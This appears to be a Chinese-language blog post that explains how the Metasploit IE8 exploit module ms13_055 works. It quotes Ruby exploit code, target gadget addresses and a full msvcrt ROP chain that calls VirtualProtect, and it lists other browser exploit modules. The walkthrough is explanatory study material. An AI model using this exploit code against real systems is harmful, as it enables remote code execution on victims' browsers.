ms13_055 metasploit

111   def get_payload(t)
112     if t[‘Rop‘] == :msvcrt
113       print_status("Using msvcrt ROP")
114       esp_align = "\x81\xc4\x54\xf2\xff\xff"
115       rop_dll = ‘msvcrt‘
116       opts    = {‘target‘=>‘xp‘}
117     else
118       print_status("Using JRE ROP")
119       esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
120       rop_dll = ‘java‘
121       opts    = {}
122     end

  

[email protected] ~/ms13_055 $ echo "81 c4 54 f2 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel00000000 81 C4 54 F2 FF FF            	add	esp, 0xFFFFF254

  

[email protected] ~/ms13_055 $ echo "81 ec f0 d8 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
00000000 81 EC F0 D8 FF FF            	sub	esp, 0xFFFFD8F0

  

esp_align代表的汇编语句的作用是对齐esp,即栈指针。

 87   def get_target(agent)
 88     return target if target.name != ‘Automatic‘
 89
 90     nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ‘‘
 91     ie = agent.scan(/MSIE (\d)/).flatten[0] || ‘‘
 92
 93     ie_name = "IE #{ie}"
 94
 95     case nt
 96     when ‘5.1‘
 97       os_name = ‘Windows XP SP3‘
 98     when ‘6.1‘
 99       os_name = ‘Windows 7‘
100     end
101
102     targets.each do |t|
103       if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
104         return t
105       end
106     end
107
108     nil
109   end

  

188   def on_request_uri(cli, request)
189     agent = request.headers[‘User-Agent‘]
190     t = get_target(agent)

  

当远程的网页客户端发出HTTP请求页面时,get_target会根据请求Header中的User-Agent信息来了解客户端操作系统以及浏览器的版本情况,然后根据预设的情况来

返回与版本相关的数据

 52       ‘Targets‘        =>
 53         [
 54           [ ‘Automatic‘, {} ],
 55           [
 56             ‘IE 8 on Windows XP SP3‘,
 57             {
 58               ‘Rop‘   => :msvcrt,
 59               ‘Pivot‘ => 0x77c15ed5, # xchg eax, esp; ret
 60               ‘Align‘ => 0x77c4d801  # add esp, 0x2c; ret
 61             }
 62           ],
 63           [
 64             ‘IE 8 on Windows 7‘,
 65             {
 66               ‘Rop‘   => :jre,
 67               ‘Pivot‘ => 0x7c348b05, # xchg eax, esp; ret
 68               ‘Align‘ => 0x7C3445F8  # add esp, 0x2c; ret
 69             }
 70           ]
 71         ],

  

如果当前的系统不支持,就会返回404页面。

111   def get_payload(t)
112     if t[‘Rop‘] == :msvcrt
113       print_status("Using msvcrt ROP")
114       esp_align = "\x81\xc4\x54\xf2\xff\xff"
115       rop_dll = ‘msvcrt‘
116       opts    = {‘target‘=>‘xp‘}
117     else
118       print_status("Using JRE ROP")
119       esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
120       rop_dll = ‘java‘
121       opts    = {}
122     end
123
124     p = esp_align + payload.encoded + rand_text_alpha(12000)
125     generate_rop_payload(rop_dll, p, opts)
126   end

  

generate_rop_payload

 77   def generate_rop_payload(rop, payload, opts={})
 78     nop      = opts[‘nop‘]      || nil
 79     badchars = opts[‘badchars‘] || ‘‘
 80     pivot    = opts[‘pivot‘]    || ‘‘
 81     target   = opts[‘target‘]   || ‘‘
 82     base     = opts[‘base‘]     || nil
 83
 84     rop = select_rop(rop, {‘target‘=>target, ‘base‘=>base})
 85     # Replace the reserved words with actual gadgets
 86     rop = rop.map {|e|
 87       if e == :nop
 88         sled = (nop) ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
 89       elsif e == :junk
 90         Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
 91       elsif e == :size
 92         payload.length
 93       elsif e == :unsafe_negate_size
 94         get_unsafe_size(payload.length)
 95       elsif e == :safe_negate_size
 96         get_safe_size(payload.length)
 97       else
 98         e
 99       end
100     }.pack("V*")
101
102     raise RuntimeError, "No ROP chain generated successfully" if rop.empty?
103
104     return pivot + rop + payload
105   end

  

会从data目录下查找定义好的[module].xml的文件,然后将gadgets中的宏定义展开,然后与pivot + gadgets + payload返回。

  3 <rop>
  4         <compatibility>
  5                 <target>WINDOWS XP SP2</target>
  6                 <target>WINDOWS XP SP3</target>
  7         </compatibility>
  8
  9         <gadgets base="0x77c10000">
 10                 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
 11                 <gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
 12                 <gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
 13                 <gadget value="junk">JUNK</gadget>
 14                 <gadget offset="0x0001362c">POP EBX # RETN</gadget>
 15                 <gadget offset="0x0004d9bb">Writable location</gadget>
 16                 <gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
 17                 <gadget offset="0x00040d13">POP EDX # RETN</gadget>
 18                 <gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
 19                 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
 20                 <gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
 21                 <gadget value="junk">JUNK</gadget>
 22                 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
 23                 <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
 24                 <gadget offset="0x0002ee15">skip 4 bytes</gadget>
 25                 <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
 26                 <gadget offset="0x0004d9bb">Writable location</gadget>
 27                 <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
 28                 <gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
 29                 <gadget offset="0x0002a184">POP ESI # RETN</gadget>
 30                 <gadget offset="0x0001aacc">JMP [EAX]</gadget>
 31                 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
 32                 <gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
 33                 <gadget offset="0x00002df9">PUSHAD # RETN</gadget>
 34                 <gadget offset="0x00025459">ptr to ‘push esp #  ret</gadget>
 35         </gadgets>
 36 </rop>

  


在查找Windows下Browser相关的ROP漏洞

[email protected] ~/msf/metasploit-framework/modules/exploits/windows/browser $ grep generate_rop_payload *.rb -n
adobe_flash_mp4_cprt.rb:148:    code = generate_rop_payload(rop_name, code, {‘target‘=>rop_target})
adobe_flash_otf_font.rb:100:      p = generate_rop_payload(‘flash‘, payload.encoded, {‘target‘=>‘11.3.300.257‘, ‘pivot‘=>pivot})
adobe_flash_otf_font.rb:110:      p = generate_rop_payload(‘flash‘, payload.encoded, {‘target‘=>‘11.3.300.265‘, ‘pivot‘=>pivot})
adobe_flash_otf_font.rb:120:      p = generate_rop_payload(‘flash‘, payload.encoded, {‘target‘=>‘11.3.300.268‘, ‘pivot‘=>pivot})
adobe_flash_otf_font.rb:130:      p = generate_rop_payload(‘java‘, payload.encoded, {‘pivot‘=>pivot})
adobe_flashplayer_flash10o.rb:194:      p = generate_rop_payload(‘java‘, payload.encoded)
adobe_flash_rtmp.rb:135:    code << generate_rop_payload(‘msvcrt‘, p, {‘target‘=>‘xp‘})
adobe_toolbutton.rb:77:    rop_10 = Rex::Text.to_unescape(generate_rop_payload(‘reader‘, ‘‘, { ‘target‘ => ‘10‘ }))
adobe_toolbutton.rb:78:    rop_11 = Rex::Text.to_unescape(generate_rop_payload(‘reader‘, ‘‘, { ‘target‘ => ‘11‘ }))
aladdin_choosefilepath_bof.rb:147:      p = generate_rop_payload(‘msvcrt‘, get_payload(cli, target_info), {‘target‘=>‘xp‘})
apple_quicktime_mime_type.rb:153:      code = generate_rop_payload(‘msvcrt‘, payload.encoded, {‘target‘=>‘xp‘})
apple_quicktime_rdrf.rb:65:    p = generate_rop_payload(‘msvcrt‘, alignment + payload.encoded, {‘target‘=>‘xp‘})
crystal_reports_printcontrol.rb:178:    rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘ => [t[‘Pivot‘]].pack("V")})
hp_loadrunner_writefilebinary.rb:207:      rop_payload = fake_object + generate_rop_payload(‘java‘, code)#, {‘pivot‘=>stack_pivot})
ie_cbutton_uaf.rb:148:        rop_payload = generate_rop_payload(‘msvcrt‘, msvcrt_align + code, {‘target‘=>‘xp‘})
ie_cbutton_uaf.rb:150:        rop_payload = generate_rop_payload(‘msvcrt‘, msvcrt_align + code, {‘target‘=>‘2003‘})
ie_cbutton_uaf.rb:153:      rop_payload = generate_rop_payload(‘java‘, java_align + code)
ie_cgenericelement_uaf.rb:126:        rop_payload = generate_rop_payload(‘msvcrt‘, align+p, {‘target‘=>‘xp‘})
ie_cgenericelement_uaf.rb:128:        rop_payload = generate_rop_payload(‘msvcrt‘, align+p, {‘target‘=>‘2003‘})
ie_cgenericelement_uaf.rb:136:      rop_payload = generate_rop_payload(‘java‘, code)
ie_execcommand_uaf.rb:139:      rop_payload = generate_rop_payload(‘msvcrt‘, code, {‘pivot‘=>stack_pivot, ‘target‘=>‘xp‘})
ie_execcommand_uaf.rb:158:      rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})
ie_setmousecapture_uaf.rb:98:      rop = generate_rop_payload(‘hxds‘, code, { ‘target‘=>‘2007‘ })
ie_setmousecapture_uaf.rb:112:      rop = generate_rop_payload(‘hxds‘, code, { ‘target‘=>‘2010‘ })
indusoft_issymbol_internationalseparator.rb:219:      rop_payload = generate_rop_payload(‘msvcrt‘, code,  {‘pivot‘=>stack_pivot, ‘target‘=>‘xp‘})
indusoft_issymbol_internationalseparator.rb:231:      rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})
inotes_dwa85w_bof.rb:204:      rop_payload = generate_rop_payload(‘msvcrt‘, code, {‘target‘=>‘xp‘})#{‘pivot‘=>stack_pivot, ‘target‘=>‘xp‘})
mozilla_firefox_onreadystatechange.rb:108:    code << generate_rop_payload(‘msvcrt‘, stack_pivot + payload.encoded, {‘target‘=>‘xp‘})
mozilla_firefox_xmlserializer.rb:110:    code << generate_rop_payload(‘msvcrt‘, stack_pivot + payload.encoded, {‘target‘=>‘xp‘})
ms10_002_ie_object.rb:248:      rop_payload = generate_rop_payload(‘msvcrt‘, p, {‘target‘=>‘xp‘})
ms10_002_ie_object.rb:250:      rop_payload = generate_rop_payload(‘java‘, p)
ms11_050_mshtml_cobjectelement.rb:182:      rop_payload = generate_rop_payload(‘java‘, p)
ms11_081_option.rb:137:      rop_payload = generate_rop_payload(‘msvcrt‘, "", {‘target‘=>‘xp‘})
ms11_081_option.rb:144:      rop_payload = generate_rop_payload(‘java‘, ‘‘)
ms12_004_midi.rb:519:    generate_rop_payload(‘msvcrt‘, p, {‘pivot‘=>padding, ‘target‘=>‘xp‘})
ms12_037_same_id.rb:133:      rop = generate_rop_payload(‘msvcrt‘, ‘‘, {‘target‘=>‘xp‘, ‘pivot‘=>pivot})
ms12_037_same_id.rb:137:      rop = generate_rop_payload(‘java‘, ‘‘, {‘pivot‘=>pivot})
ms13_009_ie_slayoutrun_uaf.rb:128:      rop_payload = generate_rop_payload(‘msvcrt‘, "", {‘target‘=>‘xp‘})
ms13_037_svg_dashstyle.rb:218:      rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})
ms13_055_canchor.rb:125:    generate_rop_payload(rop_dll, p, opts)
ms13_059_cflatmarkuppointer.rb:120:    generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})
ms13_069_caret.rb:97:    p << generate_rop_payload(‘msvcrt‘, payload.encoded, {‘target‘=>‘xp‘})
ms13_080_cdisplaypointer.rb:157:      rop_payload = generate_rop_payload(‘hxds‘, payload.encoded, {‘target‘=>‘2007‘, ‘pivot‘=>pivot})
ms13_080_cdisplaypointer.rb:174:      rop_payload = generate_rop_payload(‘hxds‘, payload.encoded, {‘target‘=>‘2010‘, ‘pivot‘=>pivot})
ms13_080_cdisplaypointer.rb:186:        rop_payload = generate_rop_payload(‘msvcrt‘, payload.encoded, {‘target‘=>‘xp‘, ‘pivot‘=>pivot})
ms13_080_cdisplaypointer.rb:197:        rop_payload = generate_rop_payload(‘java‘, payload.encoded, {‘pivot‘=>pivot})
ms13_090_cardspacesigninhelper.rb:108:    rop_payload = generate_rop_payload(‘msvcrt‘, get_payload(cli, target_info), {‘target‘=>‘xp‘, ‘pivot‘ => stack_pivot})
ms14_012_textrange.rb:85:    p = generate_rop_payload(‘hxds‘, payload.encoded, {‘target‘=>‘2010‘, ‘pivot‘=>setup})
msxml_get_definition_code_exec.rb:189:        rop = generate_rop_payload(‘msvcrt‘,‘‘,{‘target‘=>‘xp‘, ‘pivot‘=>adjust})
msxml_get_definition_code_exec.rb:193:        rop = generate_rop_payload(‘java‘,‘‘,{‘pivot‘=>adjust})
novell_groupwise_gwcls1_actvx.rb:207:        rop_payload = generate_rop_payload(‘msvcrt‘, ‘‘, ‘target‘=>‘xp‘) # Mapped at 0x0c0c07ea
novell_groupwise_gwcls1_actvx.rb:217:        rop_payload = generate_rop_payload(‘java‘, ‘‘) # Mapped at 0x0c0c07ea
ntr_activex_check_bof.rb:270:        rop_payload = generate_rop_payload(‘msvcrt‘, code, {‘target‘=>‘xp‘})
ntr_activex_check_bof.rb:274:        rop_payload = generate_rop_payload(‘java‘, code)
quickr_qp2_bof.rb:202:      rop_payload = generate_rop_payload(‘java‘, code)#, {‘pivot‘=>stack_pivot})
siemens_solid_edge_selistctrlx.rb:398:    return generate_rop_payload(‘msvcrt‘, payload.encoded, {‘pivot‘=> fake_memory, ‘target‘=>‘xp‘})
vlc_amv.rb:143:      code = generate_rop_payload(‘java‘, payload.encoded)

  

ms13_055 metasploit

时间: 2024-08-25 19:31:25

ms13_055 metasploit的相关文章

更新Kali中的metasploit

1. Kali中的metasploit默认使用apt-get进行更新,看一下metasploit路径中的.apt文件. 默认情况下会出现这种情况 # msfupdate [*] [*] Attempting to update the Metasploit Framework... [*] [*] Checking for updates via the APT repository [*] Note: expect weekly(ish) updates using this method [

Metasploit自动连接postgresql

1. 启动postgresql [email protected]:~# service postgresql start 2. 设置用户与数据库 [email protected]:~# su postgres [email protected]:/root$ createuser msf4 -P Enter password for new role: Enter it again: [email protected]:/root$ createdb --owner=msf4 msf4[em

移动安全初探:窃取微信聊天记录、Hacking Android with Metasploit

在这篇文章中我们将讨论如何获取安卓.苹果设备中的微信聊天记录,并演示如何利用后门通过Metasploit对安卓设备进行控制.文章比较基础.可动手性强,有设备的童鞋不妨边阅读文章边操作,希望能激发大家对移动终端的安全兴趣. (文章内容存在一定攻击性,目的在于普及终端安全知识.提高安全意识,如有非法使用,后果自负) “如何获取Android.iPhone手机上的微信聊天记录? ” 0×00 条件: 安卓设备已获取root权限,安装SSHDroid(通过ssh.ftp连接手机) Apple设备越狱,安

Metasploit 一些重要模块使用介绍

本文是"T00LS Metasploit(第一季)"的文档版,是个人在观看视频动手操作的一个记录,仅供学习.文中会介绍Metasploit的一些基本使用:端口扫描.smb扫描.服务识别.密码嗅探等 一.端口扫描 关于端口扫描的话,我们首先想到的可能会是nmap,除此之外呢,Metasploit也内置了相应的扫描模块.以目标:192.168.1.111为例 Nmap扫描 [email protected]:~# nmap -v -sV 192.168.1.111 Starting Nma

metasploit快速入门

今天没上班,在小黑屋里看了一个一百多页的书<metasploit新手指南>,在此将笔记分享给大家.欢迎大家批评指正,共同学习进步.   metasploit新手指南 笔记 kali 0x01 metapoit基本文件结构如下: config metasploit的环境配置信息,数据库配置信息 data渗透后模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 Db rails编译生成msf的web框架的数据库信息 Documentation 用户说明文档及开发文档 Extern

黑帽么metasploit

.Metasploit框架介绍Metasploit升级更新 Metasploit端口扫描 Metasploit SMB 获取系统信息 Metasploit 服务识别 Metasploit 密码嗅探 Metasploit SNMP 扫描 Metasploit SMB登陆验证 Metasploit VNC身份识别 Metasploit WMAP Web扫描

Metasploit基础

1.专业术语 1.1   渗透攻击(exploit) 1.2   攻击载荷(payload) 1.3   shellcode 1.4   模块(Module) 1.5   监听器(Listener) 2.Metasploit用户接口 2.1   MSF终端 2.2   MSF命令行 2.3   Armitage 3.Metasploit功能程序 3.1   MSF攻击载荷生成器 3.2   MSF编码器 3.3   Nasm Shell 4.Metasploit Exploit和metasplo

OSX10.10 Yosemite安装Metasploit

安装环境 操作时间: 2015/6/8 操作系统: OSX Yosemite 10.10.3 Metasploit版本: v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0] Ruby版本: 2.1.6p336 (2015-04-13 revision 50298) 整体安装步骤 从github上克隆Metasploit项目到本地 安装postgresql数据库并进行配置 安装特定版本的ruby,解决依赖 下面正式开始安装 1.从GitHub上克隆Metaspl

arm-linux手工安装metasploit笔记

(linux全适用) 买了一块cubieboard4 性能挺好,想在上面安装metasploit,不过源上面没有,决定手工安装 metasploit是用ruby写的(慢是有原因的,不过话说回来,即使是慢,也是大名鼎鼎的,hack界也没有听说过什么有名气的静态语言项目,所以说,不管效率如何,开发出来了就是牛B) 安装依赖,这里以debian为例 sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-